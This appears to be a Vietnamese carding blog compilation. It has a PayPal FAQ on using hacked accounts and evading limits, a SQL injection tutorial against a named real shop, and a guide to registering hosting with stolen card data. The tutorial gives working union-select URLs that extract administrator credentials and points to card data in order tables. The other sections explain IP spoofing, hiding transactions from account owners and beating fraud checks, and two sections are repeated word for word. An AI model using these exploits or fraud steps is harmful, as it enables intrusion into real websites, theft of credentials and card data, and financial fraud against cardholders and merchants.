1. Điều đầu tiên cần nhắc tới là PP phân ra 3 loại acc là : persional, premier và business .
Tuy nhiên premier và business tương tự nhau nên chúng ta chỉ bàn đến premier. Business nếu có càng tốt, mà không có cũng chẳng mất gì cả. Với premier đã đủ làm ăn rồi ^^Ok !!! Đối với tài khoản Persional, chúng ta chỉ được nhận tiền từ pp khác. Nghĩa là bạn muốn nhận tiền vào tài khoản thì phải được một tài khoản pp khác gửi tiền vào . Còn đối với tài khoản Premier, ngoài nhận tiền từ pp khác, các bạn có thể nhận tiền từ cc …. Nghĩa là người khác có thể thanh toán cho bạn bằng cc ( tạm gọi là fund tiền vào pp ) …
2. PP phân ra 2 tình trạng của tài khoản là unverify và verified
Unverify có 2 loại : 1 tài khoản vừa mới đăng kí và tài khoản đã đăng kí và add credit card vào tài khoản . Ở một số quốc gia, chỉ cần add credit card vào là đã verified rồi, tuy nhiên đối với các quốc gia lớn như USA thì add cc vẫn là chưa đủ. Đối với các tài khoản unverified thì việc nhận và chuyển tiền đi có một giới hạn nhất định về số lượng. Ngoài ra, tài khoản unveri ở dạng premier trở lên chỉ có thể nhận tiền thanh toán từ những cc chưa add vào paypal. Nghĩa là những cc đó chưa được add vào một tài khoản pp nào khác … Điều này có lẽ là hơi khó với dân carder, vì cc chưa add vào paypal khá ít, và chỉ thường ở những cc mới ra lò, mới open trở lại ….
Verified : là tài khoản đã được confirm bằng bank account hoặc add cc ( ở một vài quốc gia nhỏ ).. Đối với tài khoản verified ở dạng premier trở lên thì bạn được chấp nhận thanh toán tiền từ các cc bất kì, cho dù cc đó đã add vào paypal. Rất sướng phải không
3. Giữa Pp unver và pp ver hơn kém gì nhau không ?
Xin trả lời, chỉ hơn kém nhau về loại cc được fund tiền vào pp và uy tín … Đối với các trang ship như ebay … thì chỉ chấp nhận tài khoản pp verified. Vì đây là những tài khoản đã được chứng nhận là trong sạch.
4. Tại sao login bằng Pri Sock blacklist=0 vẫn bị limit ?
Có khả năng IP của bạn nằm trong blacklist của PP. Đối với PP, họ ko sử dụng danh sách blacklist ở bên ngoài mà sử dụng danh sách blacklist riêng. NGhĩa là cho dù sock bị blacklist ở bên ngoài mà ko nằm trong danh sách blacklist pp thì vẫn không sao.
NGoài ra, có những lúc PP của bạn limit với lí do : PP cần cung cấp thêm thông tin. Thực chất không phải PP tự dưng yêu cầu như vậy. Lí do đơn giản là location của IP bạn log vào PP khác với location đăng kí tài khoản PP. Chính vì vậy, nếu bạn không thể có IP trùng location với PP thì tốt nhất là hạn chế log vào PP account của bạn ^^
5. Làm sao để biết IP của mình có chơi được với PP hay không .
Bạn truy cập đến rapidshare.com …. đăng kí mua 1 tài khoản rapid … Sau khi được dẫn đến trang thanh toán của PP …. Nếu đến site nhập Credit Card mà button ở bên dưới là : Review Order and Contontinue hoặc có cái page đăng nhập, bên trái có dòng chữ đại loại như : click vào đây để tiếp tục sử dụng credit card để thanh toán… nghĩa là IP của bạn còn dùng tốt … các trường hợp còn lại nên thay IP khác ^^
6. Nếu PP của tôi là hack được thì có cần phải lưu ý gì không ?
Điều lưu ý trước tiên là IP log vào PP … để khỏi bị limit, cái này chắc các bạn cũng biết. Ngoài ra, trước khi quyết định xài PP, bạn phải kiểm tra xem thằng chủ PP có thường xuyên log vào PP hay không ? Nếu đang ship nữa chừng mà bị thằng chủ phát hiện thì bỏ mẹ ^^.
Để biết được, các bạn có thể xem history các lần send tiền của PP. Xem thử ngày thằng chủ PP dùng để nhận hoặc gửi tiền đi là lúc nào. Nếu là lúc gần đó thì cần phải cẩn thận hơn đừng để thẳng chủ PP biết là các bạn vừa xài PP của nó để mua hàng .
7. Làm sao để xóa history trong homepage của Acc paypal
Các bạn để ý thấy khi login vào acc pp, phía đưới page có 1 khung thông báo các giao dịch của pp trong vòng 1 tháng … Các bạn chọn vào những giao dịch liên quan đến mình ( muốn xóa ) và nhấn File Select là xongThực chất đây ko phải là xóa history và cũng pp cũng ko cho phép xóa history … Đây là chỉ xóa ko cho hiện lên trang chủ của account pp mà thôi. Người dùng vẫn vào phần history để xem …. Nhưng đa số người dùng pp ko hề vào đến phần đó ^^
8. Có Paypal có phải là tất cả ?
Xin thưa là không. Nhiều bạn lầm tưởng có pp có thể mua được acc, soft, host, ship, cashout rất sướng …. Thực chất không phải vậy.
PP là một tổ chức thanh toán rất uy tín và có nhiều quy định nghiêm ngặt về thanh toán trực tuyến. Bạn dùng PP chùa, tiền chùa, chỉ cần có lệnh đòi refund từ phía bank (chủ pp hoặc cc đòi) là ngay lập tức pp tạm khóa số tiền trong giao dịch và tài khoản của bạn lại để xác minh.Nếu bạn mua soft, ship … mà người bán đã giao soft hoặc ship hàng cho bạn (có bằng chứng) thì pp ko refund tiền nữa mà thằng bank ( của chủ pp hoặc cc) phải chịu thiệt . Còn nếu bạn mua các loại acc, host, domain …. những thứ này có thể cancel, del tài khoản nên chắc chắn sẽ không duy trì được lâu.
Chính vì vậy, đừng nghĩ có pp là mua được tất cả. Tuy nhiên, cái gì cũng có luật của nó … cho dù là acc, host …. nếu bạn dùng quá một khoảng thời gian nhất định mà chủ thẻ chưa đòi lại tiền thì sau đó có đòi cũng ko được nữa …. Cho dù là PP thì cũng không ngoại lệ ^^
Hack Shop php !!!
Victim hum nay của chúng ta là www.roboconshop.com (Hack hàng VN cho load nhanh)
Trước khi hack, việc đầu tiên là cần tìm link bị lỗi, cách tìm là thêm dấu "phẩy" sau mỡi link, các link lỗi thường là những link show sản phẩm, hoặc là các link tin tức, thông báo... ta vào tìm linklỗi nào...
Vậy là link sản phẩm ko bị lỗi, ta chuyển sang link tin tức xem sao???
============================================
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * from news_infos where id = 38\'
==============================================
Tèn tén ten, là lá la. Bị lỗi gòy. Bắt đầu khai thác lỗi nào:
Việc đầu tiên là đếm column bằng công thức order by X (Với X từ 1 đến mấy ngàn... chắc ko đến đó đâu, khoảng chừng 10 hay 20 à)
Nên nhớ ghi gõ fãi bỏ dấu fẫu, và kết thúc fải có dấu --
Nếu site trả về bình thường thì nghĩa là có X column, ở ví dụ này X là 1, nên site có 1 column, típ tục đếm. Đếm đến khi nào site trả về lỗi mới thôi
===========================================
1054 - Unknown column '7' in 'order clause'
==========================================
Tạm dịch là ko có cột thứ 7, có nghĩa là site này có 6 column.
Típ...
Sau khi bít có 6 column thì ta phải sử dụng công thức union select {số column}--
Đừng làm wá nhanh, nên coi kỹ site trả về, thấy số 2 chứ. Để thuận tiện hơn, ta thay số 38 thành null cho dễ nhìn. Đấy.
Ta xem version của nó bằng công thức version(). Mà các bạn hỉu ý nghĩa của sớ 2 chứ??? Ko hỉu cũng hẽm sao, chỉ cần bít ta khai thác thông tin từ số 2 này, tương ứng với column 2. Thay version() và số 2 ở dòng query
Version trả về là 5.0.27, tóm lại là version 5.
Hãy nhớ, trong version 5 có 1 table tên là information_schema. Đq6y là table wan trọng để lấy thông tin. Học thuộc công thức này ...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,table_name,3,4,5,6 from information_schema.tables--
===========================================
Ý nghĩa của dòng code này là truy vấn tên table nằm trong information_schema.
Site sẽ trả về rất nhìu table_name, chúng ta fãi xác định table chúng ta cần lấy thông tin.
Ví dụ như admin thì ta có table administrator
thông tin CC thì có thế là orders...
Ở đây mình chỉ lấy acc admin thui
có table admin gòy, ta truy vấn column từ table admin bằng công thức...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(table_name,char(58),column_name),3,4,5,6 from information_schema.columns--
==========================================-=-
xem xét lệnh này nào
concat() có nghĩa là kết nối giữa table và column
char(58) có nghỉa là dấu 2 chấm :
information_schema.columns nghĩa là vị trí dể lấy column
Nhấm tí, pause chút để check
về gòy, hic. Tại đánh nhầm Sorry anh em herhe
Cùng đọc nhé:
CHARACTER_SETS:CHARACTER_SET_NAME
Character_sets là table_name
: là char(58)
CHARACTER_SET_NAME là column_name
Vậy hỉu ý nghĩa của concat chưa???
Xong, ta tìm table có tên là admin nhá
Ta thấy table admin có 3 column tên là ID, user_name và user_password. Ta sắp về đến đích gòy.. kà kà
truy vấn típ = câu lệnh
======================================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(user_name,char(58),user_password),3,4,5,6 from administrators--
=====================================================
Nghĩa là hãy lấy user name và user password của thằng admin ra đây cho tôi từ table administrator
Trước khi hack, việc đầu tiên là cần tìm link bị lỗi, cách tìm là thêm dấu "phẩy" sau mỡi link, các link lỗi thường là những link show sản phẩm, hoặc là các link tin tức, thông báo... ta vào tìm linklỗi nào...
Vậy là link sản phẩm ko bị lỗi, ta chuyển sang link tin tức xem sao???
============================================
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * from news_infos where id = 38\'
==============================================
Tèn tén ten, là lá la. Bị lỗi gòy. Bắt đầu khai thác lỗi nào:
Việc đầu tiên là đếm column bằng công thức order by X (Với X từ 1 đến mấy ngàn... chắc ko đến đó đâu, khoảng chừng 10 hay 20 à)
Nên nhớ ghi gõ fãi bỏ dấu fẫu, và kết thúc fải có dấu --
Nếu site trả về bình thường thì nghĩa là có X column, ở ví dụ này X là 1, nên site có 1 column, típ tục đếm. Đếm đến khi nào site trả về lỗi mới thôi
===========================================
1054 - Unknown column '7' in 'order clause'
==========================================
Tạm dịch là ko có cột thứ 7, có nghĩa là site này có 6 column.
Típ...
Sau khi bít có 6 column thì ta phải sử dụng công thức union select {số column}--
Đừng làm wá nhanh, nên coi kỹ site trả về, thấy số 2 chứ. Để thuận tiện hơn, ta thay số 38 thành null cho dễ nhìn. Đấy.
Ta xem version của nó bằng công thức version(). Mà các bạn hỉu ý nghĩa của sớ 2 chứ??? Ko hỉu cũng hẽm sao, chỉ cần bít ta khai thác thông tin từ số 2 này, tương ứng với column 2. Thay version() và số 2 ở dòng query
Version trả về là 5.0.27, tóm lại là version 5.
Hãy nhớ, trong version 5 có 1 table tên là information_schema. Đq6y là table wan trọng để lấy thông tin. Học thuộc công thức này ...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,table_name,3,4,5,6 from information_schema.tables--
===========================================
Ý nghĩa của dòng code này là truy vấn tên table nằm trong information_schema.
Site sẽ trả về rất nhìu table_name, chúng ta fãi xác định table chúng ta cần lấy thông tin.
Ví dụ như admin thì ta có table administrator
thông tin CC thì có thế là orders...
Ở đây mình chỉ lấy acc admin thui
có table admin gòy, ta truy vấn column từ table admin bằng công thức...
===========================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(table_name,char(58),column_name),3,4,5,6 from information_schema.columns--
==========================================-=-
xem xét lệnh này nào
concat() có nghĩa là kết nối giữa table và column
char(58) có nghỉa là dấu 2 chấm :
information_schema.columns nghĩa là vị trí dể lấy column
Nhấm tí, pause chút để check
về gòy, hic. Tại đánh nhầm Sorry anh em herhe
Cùng đọc nhé:
CHARACTER_SETS:CHARACTER_SET_NAME
Character_sets là table_name
: là char(58)
CHARACTER_SET_NAME là column_name
Vậy hỉu ý nghĩa của concat chưa???
Xong, ta tìm table có tên là admin nhá
Ta thấy table admin có 3 column tên là ID, user_name và user_password. Ta sắp về đến đích gòy.. kà kà
truy vấn típ = câu lệnh
======================================================
http://roboconshop.com/xem.php?tin=null union select 1,concat(user_name,char(58),user_password),3,4,5,6 from administrators--
=====================================================
Nghĩa là hãy lấy user name và user password của thằng admin ra đây cho tôi từ table administrator
Tut Reg Host monster
Chào anh em! hôm nay rãnh có chút kinh nghiêmk chia sẽ cùng anh em..mình cùng góp ý kiến nhé:
sau một thời gian nghiên cứ Affiliates ( chương trình làm đại lóy cho mấy thằng hosting và domain tớ cũng mới nhận được tấm check đầu tiên 130$ nên có chút kinh nghiệm rg domain và host cho thằng này( hostmonster)
1) chuẩn bị sock gút, cvv gút tốt nhất là AMEX nhé, mấy thằng khác rất dể bị refund, một email chưa đăng ký hostmonster lần nào( tốt nhất là gmail, không nên sài hotmail tớ sẽ giải thích sau)
2)Thằng hostmonster rất đa nghi, nếu nó nghi acc của bạn là sài tiền chùa hoặc có nghi vấn là lock lại ngay bới vậy khi đăng ký nó bạn đừng vào trực tiếp trang hostmonster mà đăng ký mà hãy vào Affiliates program của nó trên net nhìu lắm rùi sau đó click vào hostmonster>>> mục đích của chuyện này là khi bạn click vào đó nó sẽ ghi lại Ip của bạn, cái nơi giới thiệu bạn đến với nó, nó nghỉ mình search trên google ra trang của nó từ chương trình Affiliates của nó. tớ thường dùng trang này để sau đó vào nó - một AFF của hostmonster http://www33.brinkster.com...
3)click vào đó> click vào sỉgn up hotmonster, nhớ là phài fake ip nhé trùng với Ip của quốc gia mà mình sử dụng cvv đó.
Bắt đầu đăng ký đi....điền info thật của cc vào, phải thật 100% đó kể cả số phone và cvv( nên dùng AMEX) nếu lần đầu con cc này bị decide by bank thì điền con cvv khác vào và sửa lại info của cc sao cho đúng...(chỉ được 3 lần thui nên phải check cc trước)
nếu ok hết các bạn sẽ nhận được thông báo chúc mừng từ nó...chờ 5 giây loging vào mail và acc hostmonster
* Lưu ý: anh em thường hay loging vào mail sử dụng Ip việt nam để check là không được vì khi gởi mail thằng hostmonster gởi bức mail có nhúng một đoạn code check Ip nên phải lưu ý,,,chỉ có hotmail mới phát hiện ra..còn gmail, yahoo thì không) sau khi check song copy lại info để còn sài tới rùi xóa mail bằng ip đó luôn
-Tiếp nhé..loging vào acc hostmonster song rùi vô contropanel của nó chỉnh lại sơ sơ cái mail của mình trong đó..mục đích là làm nó khỏi nghi...
sau đó nhớ là phải log out ra để hơn 1 tuần rùi mới loging vô
như vậy là anh em đã coa một Domain và host sài 2 năm rùi đó..chúc anh em thành công
mình đã thử nhìu lần kết quả là đã có một đóng host+domain đăng sài rất nhìu nếu anh em có nhu cầu tớ chia lại...giá cực kỳ mềm...
* Anh em lưu ý: khi rg cái thứ 2 trở lên thì anh em phải fake lại Ip khác nhé..nhớ đừng trùng với nhũng ip khác, và phải xóa cookie và clear cach rùi làm lại theo bước thứ 1...
sau một thời gian nghiên cứ Affiliates ( chương trình làm đại lóy cho mấy thằng hosting và domain tớ cũng mới nhận được tấm check đầu tiên 130$ nên có chút kinh nghiệm rg domain và host cho thằng này( hostmonster)
1) chuẩn bị sock gút, cvv gút tốt nhất là AMEX nhé, mấy thằng khác rất dể bị refund, một email chưa đăng ký hostmonster lần nào( tốt nhất là gmail, không nên sài hotmail tớ sẽ giải thích sau)
2)Thằng hostmonster rất đa nghi, nếu nó nghi acc của bạn là sài tiền chùa hoặc có nghi vấn là lock lại ngay bới vậy khi đăng ký nó bạn đừng vào trực tiếp trang hostmonster mà đăng ký mà hãy vào Affiliates program của nó trên net nhìu lắm rùi sau đó click vào hostmonster>>> mục đích của chuyện này là khi bạn click vào đó nó sẽ ghi lại Ip của bạn, cái nơi giới thiệu bạn đến với nó, nó nghỉ mình search trên google ra trang của nó từ chương trình Affiliates của nó. tớ thường dùng trang này để sau đó vào nó - một AFF của hostmonster http://www33.brinkster.com...
3)click vào đó> click vào sỉgn up hotmonster, nhớ là phài fake ip nhé trùng với Ip của quốc gia mà mình sử dụng cvv đó.
Bắt đầu đăng ký đi....điền info thật của cc vào, phải thật 100% đó kể cả số phone và cvv( nên dùng AMEX) nếu lần đầu con cc này bị decide by bank thì điền con cvv khác vào và sửa lại info của cc sao cho đúng...(chỉ được 3 lần thui nên phải check cc trước)
nếu ok hết các bạn sẽ nhận được thông báo chúc mừng từ nó...chờ 5 giây loging vào mail và acc hostmonster
* Lưu ý: anh em thường hay loging vào mail sử dụng Ip việt nam để check là không được vì khi gởi mail thằng hostmonster gởi bức mail có nhúng một đoạn code check Ip nên phải lưu ý,,,chỉ có hotmail mới phát hiện ra..còn gmail, yahoo thì không) sau khi check song copy lại info để còn sài tới rùi xóa mail bằng ip đó luôn
-Tiếp nhé..loging vào acc hostmonster song rùi vô contropanel của nó chỉnh lại sơ sơ cái mail của mình trong đó..mục đích là làm nó khỏi nghi...
sau đó nhớ là phải log out ra để hơn 1 tuần rùi mới loging vô
như vậy là anh em đã coa một Domain và host sài 2 năm rùi đó..chúc anh em thành công
mình đã thử nhìu lần kết quả là đã có một đóng host+domain đăng sài rất nhìu nếu anh em có nhu cầu tớ chia lại...giá cực kỳ mềm...
* Anh em lưu ý: khi rg cái thứ 2 trở lên thì anh em phải fake lại Ip khác nhé..nhớ đừng trùng với nhũng ip khác, và phải xóa cookie và clear cach rùi làm lại theo bước thứ 1...
Đăng ký:
Bài đăng (Atom)
Ngay 12/04/2016
Cuộc sống không dễ dàng, nhất là khi bạn lên kế hoạch đạt được điều gì đó có giá trị. Đừng chọn con đường đi dễ dàng. Hãy làm điều gì đó phi...
-
KeyWorld hack shop CFM Part ( 8 ) .cfm?inc=1 .asp?contentID=1 .asp?logon=1 .asp?nid=1 orderinfo.asp?t= cat_e.asp?N=1 .asp?ShopID=1good1 prod...
-
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn h...
-
Victim hum nay của chúng ta là www.roboconshop.com (Hack hàng VN cho load nhanh) Trước khi hack, việc đầu tiên là cần tìm link bị lỗi, cách ...